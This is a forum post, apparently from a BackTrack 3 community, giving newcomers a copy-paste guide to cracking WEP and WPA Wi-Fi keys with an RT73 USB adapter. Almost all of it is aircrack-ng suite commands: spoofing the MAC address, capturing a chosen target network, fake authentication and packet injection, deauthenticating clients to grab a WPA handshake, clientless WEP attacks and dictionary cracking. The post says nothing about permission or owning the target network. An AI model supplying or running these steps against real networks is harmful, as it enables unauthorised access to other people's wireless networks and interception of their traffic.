hello all,

Just got my edimax EW-7318USg and it didn't work out of the box for me so i searched and tried and tried and finally it worked!
so for all the newbies under us here is a small guide WPA and WEP cracking, Client and Clientless
I hope it is a clear guide!
----------------------------------------------------------------------------

The Guide:
insert the Backtrack 3 final CD and open a shell and just copy past the following:

Code:
Configure card
Code:
modprobe -r rt73 (unload driver)
modprobe rt73 (load driver)
airmon-ng(check if you see your RT73 driver card)
airmon-ng stop rausb0
ifconfig rausb down
macchanger --mac 00:11:22:33:44:55 rausb0
ifconfig rausb0 up (interface up)
airmon-ng start rausb0
iwconfig rausb0 rate 1M (Lower card rate to 1MB)
Code:
Wep
Code:
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel>  -w <output>  --bssid <mac> rausb0 (target SSID)
aireplay-ng -1 0  -a <mac> -h <yourmac> rausb0 (authenticate)
aireplay-ng -3 -b <mac> -h <yourmac> rausb0 (inject IV's)
aircrack-ng <output>.cap
Optional!:
aircrack-ng -n 128 <output>*.cap (crack wep, it works a little fast!)
---------------------------------------------


Code:
WPA
Code:
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel>  -w <output>  --bssid <mac> rausb0 (target SSID)
aireplay-ng -0 1 -a <mac> -c <yourmac> rausb0 (De Auth)
aircrack-ng -w password.lst <output>*.cap
----------------------------------------------


Code:
Clientless wep cracking:
Code:
airodump-ng -c <channel> -w <filename> --bssid <bssid> rausb0

aireplay-ng -1 0 -a <bssid> -h <pc mac> rausb0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <pc mac> rausb0
use this packet? YES

aircrack-ng <output>*.cap
-------------------------------------------------------------------------


feel free to comment and make it meby better!

Meby a mod can move this to the Backtrack 3 howto or a new section about drivers?
and pin this one??

tested and worked on beta 4